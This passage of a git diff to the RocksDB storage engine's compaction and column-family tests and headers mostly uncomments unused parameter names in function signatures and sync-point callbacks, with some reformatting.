TEST_SYNC_POINT("ColumnFamilyTest::MultiManual:4"); cf_1_1 = false; @@ -1440,7 +1439,7 @@ TEST_F(ColumnFamilyTest, AutomaticAndManualCompactions) { {"ColumnFamilyTest::AutoManual:2", "ColumnFamilyTest::AutoManual:5"}, {"ColumnFamilyTest::AutoManual:2", "ColumnFamilyTest::AutoManual:3"}}); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* /*arg*/) { + "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* arg) { if (cf_1_1) { cf_1_1 = false; TEST_SYNC_POINT("ColumnFamilyTest::AutoManual:4"); @@ -1541,7 +1540,7 @@ TEST_F(ColumnFamilyTest, ManualAndAutomaticCompactions) { {"ColumnFamilyTest::ManualAuto:5", "ColumnFamilyTest::ManualAuto:2"}, {"ColumnFamilyTest::ManualAuto:2", "ColumnFamilyTest::ManualAuto:3"}}); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* /*arg*/) { + "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* arg) { if (cf_1_1) { TEST_SYNC_POINT("ColumnFamilyTest::ManualAuto:4"); cf_1_1 = false; @@ -1634,7 +1633,7 @@ TEST_F(ColumnFamilyTest, SameCFManualManualCompactions) { {"ColumnFamilyTest::ManualManual:1", "ColumnFamilyTest::ManualManual:3"}}); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* /*arg*/) { + "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* arg) { if (cf_1_1) { TEST_SYNC_POINT("ColumnFamilyTest::ManualManual:4"); cf_1_1 = false; @@ -1732,7 +1731,7 @@ TEST_F(ColumnFamilyTest, SameCFManualAutomaticCompactions) { {"ColumnFamilyTest::ManualAuto:1", "ColumnFamilyTest::ManualAuto:2"}, {"ColumnFamilyTest::ManualAuto:1", "ColumnFamilyTest::ManualAuto:3"}}); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* /*arg*/) { + "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* arg) { if (cf_1_1) { TEST_SYNC_POINT("ColumnFamilyTest::ManualAuto:4"); cf_1_1 = false; @@ -1824,7 +1823,7 @@ TEST_F(ColumnFamilyTest, SameCFManualAutomaticCompactionsLevel) { "ColumnFamilyTest::ManualAuto:3"}, {"ColumnFamilyTest::ManualAuto:1", "ColumnFamilyTest::ManualAuto:3"}}); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* /*arg*/) { + "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* arg) { if (cf_1_1) { TEST_SYNC_POINT("ColumnFamilyTest::ManualAuto:4"); cf_1_1 = false; @@ -1927,7 +1926,7 @@ TEST_F(ColumnFamilyTest, SameCFManualAutomaticConflict) { {"ColumnFamilyTest::ManualAutoCon:1", "ColumnFamilyTest::ManualAutoCon:3"}}); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* /*arg*/) { + "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* arg) { if (cf_1_1) { TEST_SYNC_POINT("ColumnFamilyTest::ManualAutoCon:4"); cf_1_1 = false; @@ -2031,7 +2030,7 @@ TEST_F(ColumnFamilyTest, SameCFAutomaticManualCompactions) { {"CompactionPicker::CompactRange:Conflict", "ColumnFamilyTest::AutoManual:3"}}); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* /*arg*/) { + "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* arg) { if (cf_1_1) { TEST_SYNC_POINT("ColumnFamilyTest::AutoManual:4"); cf_1_1 = false; @@ -2477,21 +2476,21 @@ TEST_F(ColumnFamilyTest, CreateAndDropRace) { auto main_thread_id = std::this_thread::get_id(); - rocksdb::SyncPoint::GetInstance()->SetCallBack( - "PersistRocksDBOptions:start", [&](void* 
/*arg*/) { - auto current_thread_id = std::this_thread::get_id(); - // If it's the main thread hitting this sync-point, then it - // will be blocked until some other thread update the test_stage. - if (main_thread_id == current_thread_id) { - test_stage = kMainThreadStartPersistingOptionsFile; - while (test_stage < kChildThreadFinishDroppingColumnFamily) { - Env::Default()->SleepForMicroseconds(100); - } - } - }); + rocksdb::SyncPoint::GetInstance()->SetCallBack("PersistRocksDBOptions:start", + [&](void* arg) { + auto current_thread_id = std::this_thread::get_id(); + // If it's the main thread hitting this sync-point, then it + // will be blocked until some other thread update the test_stage. + if (main_thread_id == current_thread_id) { + test_stage = kMainThreadStartPersistingOptionsFile; + while (test_stage < kChildThreadFinishDroppingColumnFamily) { + Env::Default()->SleepForMicroseconds(100); + } + } + }); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "WriteThread::EnterUnbatched:Wait", [&](void* /*arg*/) { + "WriteThread::EnterUnbatched:Wait", [&](void* arg) { // This means a thread doing DropColumnFamily() is waiting for // other thread to finish persisting options. // In such case, we update the test_stage to unblock the main thread. diff --git a/db/compact_files_test.cc b/db/compact_files_test.cc index 7f150453960..5aad6114f5e 100644 --- a/db/compact_files_test.cc +++ b/db/compact_files_test.cc @@ -37,7 +37,8 @@ class FlushedFileCollector : public EventListener { FlushedFileCollector() {} ~FlushedFileCollector() {} - virtual void OnFlushCompleted(DB* /*db*/, const FlushJobInfo& info) override { + virtual void OnFlushCompleted( + DB* db, const FlushJobInfo& info) override { std::lock_guard<std::mutex> lock(mutex_); flushed_files_.push_back(info.file_path); } @@ -256,9 +257,9 @@ TEST_F(CompactFilesTest, CapturingPendingFiles) { TEST_F(CompactFilesTest, CompactionFilterWithGetSv) { class FilterWithGet : public CompactionFilter { public: - virtual bool Filter(int /*level*/, const Slice& /*key*/, - const Slice& /*value*/, std::string* /*new_value*/, - bool* /*value_changed*/) const override { + virtual bool Filter(int level, const Slice& key, const Slice& value, + std::string* new_value, + bool* value_changed) const override { if (db_ == nullptr) { return true; } diff --git a/db/compacted_db_impl.h b/db/compacted_db_impl.h index 736002e1e52..de32f21e681 100644 --- a/db/compacted_db_impl.h +++ b/db/compacted_db_impl.h @@ -32,56 +32,55 @@ class CompactedDBImpl : public DBImpl { override; using DBImpl::Put; - virtual Status Put(const WriteOptions& /*options*/, - ColumnFamilyHandle* /*column_family*/, - const Slice& /*key*/, const Slice& /*value*/) override { + virtual Status Put(const WriteOptions& options, + ColumnFamilyHandle* column_family, const Slice& key, + const Slice& value) override { return Status::NotSupported("Not supported in compacted db mode."); } using DBImpl::Merge; - virtual Status Merge(const WriteOptions& /*options*/, - ColumnFamilyHandle* /*column_family*/, - const Slice& /*key*/, const Slice& /*value*/) override { + virtual Status Merge(const WriteOptions& options, + ColumnFamilyHandle* column_family, const Slice& key, + const Slice& value) override { return Status::NotSupported("Not supported in compacted db mode."); } using DBImpl::Delete; - virtual Status Delete(const WriteOptions& /*options*/, - ColumnFamilyHandle* /*column_family*/, - const Slice& /*key*/) override { + virtual Status Delete(const WriteOptions& options, + ColumnFamilyHandle* column_family, + const Slice&
key) override { return Status::NotSupported("Not supported in compacted db mode."); } - virtual Status Write(const WriteOptions& /*options*/, - WriteBatch* /*updates*/) override { + virtual Status Write(const WriteOptions& options, + WriteBatch* updates) override { return Status::NotSupported("Not supported in compacted db mode."); } using DBImpl::CompactRange; - virtual Status CompactRange(const CompactRangeOptions& /*options*/, - ColumnFamilyHandle* /*column_family*/, - const Slice* /*begin*/, - const Slice* /*end*/) override { + virtual Status CompactRange(const CompactRangeOptions& options, + ColumnFamilyHandle* column_family, + const Slice* begin, const Slice* end) override { return Status::NotSupported("Not supported in compacted db mode."); } virtual Status DisableFileDeletions() override { return Status::NotSupported("Not supported in compacted db mode."); } - virtual Status EnableFileDeletions(bool /*force*/) override { + virtual Status EnableFileDeletions(bool force) override { return Status::NotSupported("Not supported in compacted db mode."); } virtual Status GetLiveFiles(std::vector<std::string>&, - uint64_t* /*manifest_file_size*/, - bool /*flush_memtable*/ = true) override { + uint64_t* manifest_file_size, + bool flush_memtable = true) override { return Status::NotSupported("Not supported in compacted db mode."); } using DBImpl::Flush; - virtual Status Flush(const FlushOptions& /*options*/, - ColumnFamilyHandle* /*column_family*/) override { + virtual Status Flush(const FlushOptions& options, + ColumnFamilyHandle* column_family) override { return Status::NotSupported("Not supported in compacted db mode."); } using DB::IngestExternalFile; virtual Status IngestExternalFile( - ColumnFamilyHandle* /*column_family*/, - const std::vector<std::string>& /*external_files*/, - const IngestExternalFileOptions& /*ingestion_options*/) override { + ColumnFamilyHandle* column_family, + const std::vector<std::string>& external_files, + const IngestExternalFileOptions& ingestion_options) override { return Status::NotSupported("Not supported in compacted db mode."); } diff --git a/db/compaction_iterator.cc b/db/compaction_iterator.cc index 211a48def73..08ae1973409 100644 --- a/db/compaction_iterator.cc +++ b/db/compaction_iterator.cc @@ -50,7 +50,7 @@ CompactionIterator::CompactionIterator( CompactionIterator::CompactionIterator( InternalIterator* input, const Comparator* cmp, MergeHelper* merge_helper, - SequenceNumber /*last_sequence*/, std::vector<SequenceNumber>* snapshots, + SequenceNumber last_sequence, std::vector<SequenceNumber>* snapshots, SequenceNumber earliest_write_conflict_snapshot, Env* env, bool expect_valid_internal_key, RangeDelAggregator* range_del_agg, std::unique_ptr<CompactionProxy> compaction, diff --git a/db/compaction_iterator.h b/db/compaction_iterator.h index 492e53abff0..cad23866699 100644 --- a/db/compaction_iterator.h +++ b/db/compaction_iterator.h @@ -31,7 +31,7 @@ class CompactionIterator { : compaction_(compaction) {} virtual ~CompactionProxy() = default; - virtual int level(size_t /*compaction_input_level*/ = 0) const { + virtual int level(size_t compaction_input_level = 0) const { return compaction_->level(); } virtual bool KeyNotExistsBeyondOutputLevel( diff --git a/db/compaction_iterator_test.cc b/db/compaction_iterator_test.cc index 7f2915b0aa3..b625c99ffaa 100644 --- a/db/compaction_iterator_test.cc +++ b/db/compaction_iterator_test.cc @@ -17,15 +17,15 @@ namespace rocksdb { // Expects no merging attempts.
class NoMergingMergeOp : public MergeOperator { public: - bool FullMergeV2(const MergeOperationInput& /*merge_in*/, - MergeOperationOutput* /*merge_out*/) const override { + bool FullMergeV2(const MergeOperationInput& merge_in, + MergeOperationOutput* merge_out) const override { ADD_FAILURE(); return false; } - bool PartialMergeMulti(const Slice& /*key*/, - const std::deque<Slice>& /*operand_list*/, - std::string* /*new_value*/, - Logger* /*logger*/) const override { + bool PartialMergeMulti(const Slice& key, + const std::deque<Slice>& operand_list, + std::string* new_value, + Logger* logger) const override { ADD_FAILURE(); return false; } @@ -39,10 +39,9 @@ class NoMergingMergeOp : public MergeOperator { // Always returns Decition::kRemove. class StallingFilter : public CompactionFilter { public: - virtual Decision FilterV2(int /*level*/, const Slice& key, ValueType /*t*/, - const Slice& /*existing_value*/, - std::string* /*new_value*/, - std::string* /*skip_until*/) const override { + virtual Decision FilterV2(int level, const Slice& key, ValueType t, + const Slice& existing_value, std::string* new_value, + std::string* skip_until) const override { int k = std::atoi(key.ToString().c_str()); last_seen.store(k); while (k >= stall_at.load()) { @@ -113,7 +112,7 @@ class LoggingForwardVectorIterator : public InternalIterator { keys_.begin(); } - virtual void SeekForPrev(const Slice& /*target*/) override { assert(false); } + virtual void SeekForPrev(const Slice& target) override { assert(false); } virtual void Next() override { assert(Valid()); @@ -145,9 +144,9 @@ class FakeCompaction : public CompactionIterator::CompactionProxy { public: FakeCompaction() = default; - virtual int level(size_t /*compaction_input_level*/) const { return 0; } + virtual int level(size_t compaction_input_level) const { return 0; } virtual bool KeyNotExistsBeyondOutputLevel( - const Slice& /*user_key*/, std::vector<size_t>* /*level_ptrs*/) const { + const Slice& user_key, std::vector<size_t>* level_ptrs) const { return key_not_exists_beyond_output_level; } virtual bool bottommost_level() const { return false; } @@ -277,9 +276,9 @@ TEST_F(CompactionIteratorTest, RangeDeletionWithSnapshots) { TEST_F(CompactionIteratorTest, CompactionFilterSkipUntil) { class Filter : public CompactionFilter { - virtual Decision FilterV2(int /*level*/, const Slice& key, ValueType t, + virtual Decision FilterV2(int level, const Slice& key, ValueType t, const Slice& existing_value, - std::string* /*new_value*/, + std::string* new_value, std::string* skip_until) const override { std::string k = key.ToString(); std::string v = existing_value.ToString(); diff --git a/db/compaction_job_stats_test.cc b/db/compaction_job_stats_test.cc index c20c120e580..9a8372f5785 100644 --- a/db/compaction_job_stats_test.cc +++ b/db/compaction_job_stats_test.cc @@ -426,7 +426,7 @@ class CompactionJobStatsChecker : public EventListener { // Once a compaction completed, this function will verify the returned // CompactionJobInfo with the oldest CompactionJobInfo added earlier // in "expected_stats_" which has not yet being used for verification.
- virtual void OnCompactionCompleted(DB* /*db*/, const CompactionJobInfo& ci) { + virtual void OnCompactionCompleted(DB *db, const CompactionJobInfo& ci) { if (verify_next_comp_io_stats_) { ASSERT_GT(ci.stats.file_write_nanos, 0); ASSERT_GT(ci.stats.file_range_sync_nanos, 0); @@ -806,7 +806,7 @@ TEST_P(CompactionJobStatsTest, CompactionJobStatsTest) { stats_checker->set_verify_next_comp_io_stats(true); std::atomic<bool> first_prepare_write(true); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "WritableFileWriter::Append:BeforePrepareWrite", [&](void* /*arg*/) { + "WritableFileWriter::Append:BeforePrepareWrite", [&](void* arg) { if (first_prepare_write.load()) { options.env->SleepForMicroseconds(3); first_prepare_write.store(false); @@ -815,7 +815,7 @@ TEST_P(CompactionJobStatsTest, CompactionJobStatsTest) { std::atomic<bool> first_flush(true); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "WritableFileWriter::Flush:BeforeAppend", [&](void* /*arg*/) { + "WritableFileWriter::Flush:BeforeAppend", [&](void* arg) { if (first_flush.load()) { options.env->SleepForMicroseconds(3); first_flush.store(false); @@ -824,7 +824,7 @@ TEST_P(CompactionJobStatsTest, CompactionJobStatsTest) { std::atomic<bool> first_sync(true); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "WritableFileWriter::SyncInternal:0", [&](void* /*arg*/) { + "WritableFileWriter::SyncInternal:0", [&](void* arg) { if (first_sync.load()) { options.env->SleepForMicroseconds(3); first_sync.store(false); @@ -833,7 +833,7 @@ TEST_P(CompactionJobStatsTest, CompactionJobStatsTest) { std::atomic<bool> first_range_sync(true); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "WritableFileWriter::RangeSync:0", [&](void* /*arg*/) { + "WritableFileWriter::RangeSync:0", [&](void* arg) { if (first_range_sync.load()) { options.env->SleepForMicroseconds(3); first_range_sync.store(false); diff --git a/db/compaction_picker.cc b/db/compaction_picker.cc index 7264ed20c6f..6ee4ebd1f16 100644 --- a/db/compaction_picker.cc +++ b/db/compaction_picker.cc @@ -199,7 +199,7 @@ void CompactionPicker::GetRange(const std::vector<CompactionInputFiles>& inputs, assert(initialized); } -bool CompactionPicker::ExpandInputsToCleanCut(const std::string& /*cf_name*/, +bool CompactionPicker::ExpandInputsToCleanCut(const std::string& cf_name, VersionStorageInfo* vstorage, CompactionInputFiles* inputs) { // This isn't good compaction @@ -318,7 +318,7 @@ Compaction* CompactionPicker::CompactFiles( Status CompactionPicker::GetCompactionInputsFromFileNumbers( std::vector<CompactionInputFiles>* input_files, std::unordered_set<uint64_t>* input_set, const VersionStorageInfo* vstorage, - const CompactionOptions& /*compact_options*/) const { + const CompactionOptions& compact_options) const { if (input_set->size() == 0U) { return Status::InvalidArgument( "Compaction must include at least one file."); @@ -1581,9 +1581,8 @@ Compaction* FIFOCompactionPicker::PickCompaction( Compaction* FIFOCompactionPicker::CompactRange( const std::string& cf_name, const MutableCFOptions& mutable_cf_options, VersionStorageInfo* vstorage, int input_level, int output_level, - uint32_t /*output_path_id*/, const InternalKey* /*begin*/, - const InternalKey* /*end*/, InternalKey** compaction_end, - bool* /*manual_conflict*/) { + uint32_t output_path_id, const InternalKey* begin, const InternalKey* end, + InternalKey** compaction_end, bool* manual_conflict) { assert(input_level == 0); assert(output_level == 0); *compaction_end = nullptr; diff --git a/db/compaction_picker.h b/db/compaction_picker.h index 44b93d7747b..f44139c2dd9 100644 --- a/db/compaction_picker.h +++
b/db/compaction_picker.h @@ -263,29 +263,27 @@ class NullCompactionPicker : public CompactionPicker { virtual ~NullCompactionPicker() {} // Always return "nullptr" - Compaction* PickCompaction(const std::string& /*cf_name*/, - const MutableCFOptions& /*mutable_cf_options*/, - VersionStorageInfo* /*vstorage*/, - LogBuffer* /*log_buffer*/) override { + Compaction* PickCompaction(const std::string& cf_name, + const MutableCFOptions& mutable_cf_options, + VersionStorageInfo* vstorage, + LogBuffer* log_buffer) override { return nullptr; } // Always return "nullptr" - Compaction* CompactRange(const std::string& /*cf_name*/, - const MutableCFOptions& /*mutable_cf_options*/, - VersionStorageInfo* /*vstorage*/, - int /*input_level*/, int /*output_level*/, - uint32_t /*output_path_id*/, - const InternalKey* /*begin*/, - const InternalKey* /*end*/, - InternalKey** /*compaction_end*/, - bool* /*manual_conflict*/) override { + Compaction* CompactRange(const std::string& cf_name, + const MutableCFOptions& mutable_cf_options, + VersionStorageInfo* vstorage, int input_level, + int output_level, uint32_t output_path_id, + const InternalKey* begin, const InternalKey* end, + InternalKey** compaction_end, + bool* manual_conflict) override { return nullptr; } // Always returns false. virtual bool NeedsCompaction( - const VersionStorageInfo* /*vstorage*/) const override { + const VersionStorageInfo* vstorage) const override { return false; } }; diff --git a/db/compaction_picker_test.cc b/db/compaction_picker_test.cc index 7e981451725..1ced12cfd5d 100644 --- a/db/compaction_picker_test.cc +++ b/db/compaction_picker_test.cc @@ -20,9 +20,7 @@ namespace rocksdb { class CountingLogger : public Logger { public: using Logger::Logv; - virtual void Logv(const char* /*format*/, va_list /*ap*/) override { - log_count++; - } + virtual void Logv(const char* format, va_list ap) override { log_count++; } size_t log_count; }; diff --git a/db/comparator_db_test.cc b/db/comparator_db_test.cc index 83740ffda00..28a2a5658e7 100644 --- a/db/comparator_db_test.cc +++ b/db/comparator_db_test.cc @@ -188,10 +188,10 @@ class DoubleComparator : public Comparator { return -1; } } - virtual void FindShortestSeparator(std::string* /*start*/, - const Slice& /*limit*/) const override {} + virtual void FindShortestSeparator(std::string* start, + const Slice& limit) const override {} - virtual void FindShortSuccessor(std::string* /*key*/) const override {} + virtual void FindShortSuccessor(std::string* key) const override {} }; class HashComparator : public Comparator { @@ -211,10 +211,10 @@ class HashComparator : public Comparator { return -1; } } - virtual void FindShortestSeparator(std::string* /*start*/, - const Slice& /*limit*/) const override {} + virtual void FindShortestSeparator(std::string* start, + const Slice& limit) const override {} - virtual void FindShortSuccessor(std::string* /*key*/) const override {} + virtual void FindShortSuccessor(std::string* key) const override {} }; class TwoStrComparator : public Comparator { @@ -243,10 +243,10 @@ class TwoStrComparator : public Comparator { } return a2.compare(b2); } - virtual void FindShortestSeparator(std::string* /*start*/, - const Slice& /*limit*/) const override {} + virtual void FindShortestSeparator(std::string* start, + const Slice& limit) const override {} - virtual void FindShortSuccessor(std::string* /*key*/) const override {} + virtual void FindShortSuccessor(std::string* key) const override {} }; } // namespace diff --git a/db/db_block_cache_test.cc 
b/db/db_block_cache_test.cc index f4d61eefe6a..169cadc85c3 100644 --- a/db/db_block_cache_test.cc +++ b/db/db_block_cache_test.cc @@ -47,7 +47,7 @@ class DBBlockCacheTest : public DBTestBase { return options; } - void InitTable(const Options& /*options*/) { + void InitTable(const Options& options) { std::string value(kValueSize, 'a'); for (size_t i = 0; i < kNumBlocks; i++) { ASSERT_OK(Put(ToString(i), value.c_str())); diff --git a/db/db_bloom_filter_test.cc b/db/db_bloom_filter_test.cc index d4b034c5346..e6248a04014 100644 --- a/db/db_bloom_filter_test.cc +++ b/db/db_bloom_filter_test.cc @@ -1057,10 +1057,10 @@ TEST_F(DBBloomFilterTest, OptimizeFiltersForHits) { int32_t non_trivial_move = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:TrivialMove", - [&](void* /*arg*/) { trivial_move++; }); + [&](void* arg) { trivial_move++; }); rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:NonTrivial", - [&](void* /*arg*/) { non_trivial_move++; }); + [&](void* arg) { non_trivial_move++; }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); CompactRangeOptions compact_options; diff --git a/db/db_compaction_filter_test.cc b/db/db_compaction_filter_test.cc index a25adcc356f..9f751f059fa 100644 --- a/db/db_compaction_filter_test.cc +++ b/db/db_compaction_filter_test.cc @@ -26,9 +26,9 @@ class DBTestCompactionFilter : public DBTestBase { class KeepFilter : public CompactionFilter { public: - virtual bool Filter(int /*level*/, const Slice& /*key*/, - const Slice& /*value*/, std::string* /*new_value*/, - bool* /*value_changed*/) const override { + virtual bool Filter(int level, const Slice& key, const Slice& value, + std::string* new_value, bool* value_changed) const + override { cfilter_count++; return false; } @@ -38,9 +38,9 @@ class KeepFilter : public CompactionFilter { class DeleteFilter : public CompactionFilter { public: - virtual bool Filter(int /*level*/, const Slice& /*key*/, - const Slice& /*value*/, std::string* /*new_value*/, - bool* /*value_changed*/) const override { + virtual bool Filter(int level, const Slice& key, const Slice& value, + std::string* new_value, bool* value_changed) const + override { cfilter_count++; return true; } @@ -50,9 +50,9 @@ class DeleteFilter : public CompactionFilter { class DeleteISFilter : public CompactionFilter { public: - virtual bool Filter(int /*level*/, const Slice& key, const Slice& /*value*/, - std::string* /*new_value*/, - bool* /*value_changed*/) const override { + virtual bool Filter(int level, const Slice& key, const Slice& value, + std::string* new_value, + bool* value_changed) const override { cfilter_count++; int i = std::stoi(key.ToString()); if (i > 5 && i <= 105) { @@ -70,10 +70,8 @@ class DeleteISFilter : public CompactionFilter { // zero-padded to length 10. 
class SkipEvenFilter : public CompactionFilter { public: - virtual Decision FilterV2(int /*level*/, const Slice& key, - ValueType /*value_type*/, - const Slice& /*existing_value*/, - std::string* /*new_value*/, + virtual Decision FilterV2(int level, const Slice& key, ValueType value_type, + const Slice& existing_value, std::string* new_value, std::string* skip_until) const override { cfilter_count++; int i = std::stoi(key.ToString()); @@ -95,9 +93,9 @@ class DelayFilter : public CompactionFilter { public: explicit DelayFilter(DBTestBase* d) : db_test(d) {} - virtual bool Filter(int /*level*/, const Slice& /*key*/, - const Slice& /*value*/, std::string* /*new_value*/, - bool* /*value_changed*/) const override { + virtual bool Filter(int level, const Slice& key, const Slice& value, + std::string* new_value, + bool* value_changed) const override { db_test->env_->addon_time_.fetch_add(1000); return true; } @@ -112,9 +110,9 @@ class ConditionalFilter : public CompactionFilter { public: explicit ConditionalFilter(const std::string* filtered_value) : filtered_value_(filtered_value) {} - virtual bool Filter(int /*level*/, const Slice& /*key*/, const Slice& value, - std::string* /*new_value*/, - bool* /*value_changed*/) const override { + virtual bool Filter(int level, const Slice& key, const Slice& value, + std::string* new_value, + bool* value_changed) const override { return value.ToString() == *filtered_value_; } @@ -128,9 +126,9 @@ class ChangeFilter : public CompactionFilter { public: explicit ChangeFilter() {} - virtual bool Filter(int /*level*/, const Slice& /*key*/, - const Slice& /*value*/, std::string* new_value, - bool* value_changed) const override { + virtual bool Filter(int level, const Slice& key, const Slice& value, + std::string* new_value, bool* value_changed) const + override { assert(new_value != nullptr); *new_value = NEW_VALUE; *value_changed = true; @@ -219,7 +217,7 @@ class DelayFilterFactory : public CompactionFilterFactory { public: explicit DelayFilterFactory(DBTestBase* d) : db_test(d) {} virtual std::unique_ptr<CompactionFilter> CreateCompactionFilter( - const CompactionFilter::Context& /*context*/) override { + const CompactionFilter::Context& context) override { return std::unique_ptr<CompactionFilter>(new DelayFilter(db_test)); } @@ -235,7 +233,7 @@ class ConditionalFilterFactory : public CompactionFilterFactory { : filtered_value_(filtered_value.ToString()) {} virtual std::unique_ptr<CompactionFilter> CreateCompactionFilter( - const CompactionFilter::Context& /*context*/) override { + const CompactionFilter::Context& context) override { return std::unique_ptr<CompactionFilter>( new ConditionalFilter(&filtered_value_)); } @@ -253,7 +251,7 @@ class ChangeFilterFactory : public CompactionFilterFactory { explicit ChangeFilterFactory() {} virtual std::unique_ptr<CompactionFilter> CreateCompactionFilter( - const CompactionFilter::Context& /*context*/) override { + const CompactionFilter::Context& context) override { return std::unique_ptr<CompactionFilter>(new ChangeFilter()); } diff --git a/db/db_compaction_test.cc b/db/db_compaction_test.cc index 898db51ef7a..4c7da8d1b50 100644 --- a/db/db_compaction_test.cc +++ b/db/db_compaction_test.cc @@ -53,7 +53,7 @@ class FlushedFileCollector : public EventListener { FlushedFileCollector() {} ~FlushedFileCollector() {} - virtual void OnFlushCompleted(DB* /*db*/, const FlushJobInfo& info) override { + virtual void OnFlushCompleted(DB* db, const FlushJobInfo& info) override { std::lock_guard<std::mutex> lock(mutex_); flushed_files_.push_back(info.file_path); } @@ -282,7 +282,7 @@
TEST_F(DBCompactionTest, TestTableReaderForCompaction) { }); rocksdb::SyncPoint::GetInstance()->SetCallBack( "TableCache::GetTableReader:0", - [&](void* /*arg*/) { num_new_table_reader++; }); + [&](void* arg) { num_new_table_reader++; }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); for (int k = 0; k < options.level0_file_num_compaction_trigger; ++k) { @@ -838,7 +838,7 @@ TEST_P(DBCompactionTestWithParam, TrivialMoveOneFile) { int32_t trivial_move = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:TrivialMove", - [&](void* /*arg*/) { trivial_move++; }); + [&](void* arg) { trivial_move++; }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); Options options = CurrentOptions(); @@ -895,10 +895,10 @@ TEST_P(DBCompactionTestWithParam, TrivialMoveNonOverlappingFiles) { int32_t non_trivial_move = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:TrivialMove", - [&](void* /*arg*/) { trivial_move++; }); + [&](void* arg) { trivial_move++; }); rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:NonTrivial", - [&](void* /*arg*/) { non_trivial_move++; }); + [&](void* arg) { non_trivial_move++; }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); Options options = CurrentOptions(); @@ -994,10 +994,10 @@ TEST_P(DBCompactionTestWithParam, TrivialMoveTargetLevel) { int32_t non_trivial_move = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:TrivialMove", - [&](void* /*arg*/) { trivial_move++; }); + [&](void* arg) { trivial_move++; }); rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:NonTrivial", - [&](void* /*arg*/) { non_trivial_move++; }); + [&](void* arg) { non_trivial_move++; }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); Options options = CurrentOptions(); @@ -1053,10 +1053,10 @@ TEST_P(DBCompactionTestWithParam, ManualCompactionPartial) { int32_t non_trivial_move = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:TrivialMove", - [&](void* /*arg*/) { trivial_move++; }); + [&](void* arg) { trivial_move++; }); rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:NonTrivial", - [&](void* /*arg*/) { non_trivial_move++; }); + [&](void* arg) { non_trivial_move++; }); bool first = true; // Purpose of dependencies: // 4 -> 1: ensure the order of two non-trivial compactions @@ -1067,7 +1067,7 @@ TEST_P(DBCompactionTestWithParam, ManualCompactionPartial) { {"DBCompaction::ManualPartial:5", "DBCompaction::ManualPartial:2"}, {"DBCompaction::ManualPartial:5", "DBCompaction::ManualPartial:3"}}); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* /*arg*/) { + "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* arg) { if (first) { first = false; TEST_SYNC_POINT("DBCompaction::ManualPartial:4"); @@ -1198,17 +1198,17 @@ TEST_F(DBCompactionTest, DISABLED_ManualPartialFill) { int32_t non_trivial_move = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:TrivialMove", - [&](void* /*arg*/) { trivial_move++; }); + [&](void* arg) { trivial_move++; }); rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:NonTrivial", - [&](void* /*arg*/) { non_trivial_move++; }); + [&](void* arg) { non_trivial_move++; }); bool first = true; bool second = true; rocksdb::SyncPoint::GetInstance()->LoadDependency( {{"DBCompaction::PartialFill:4", "DBCompaction::PartialFill:1"}, 
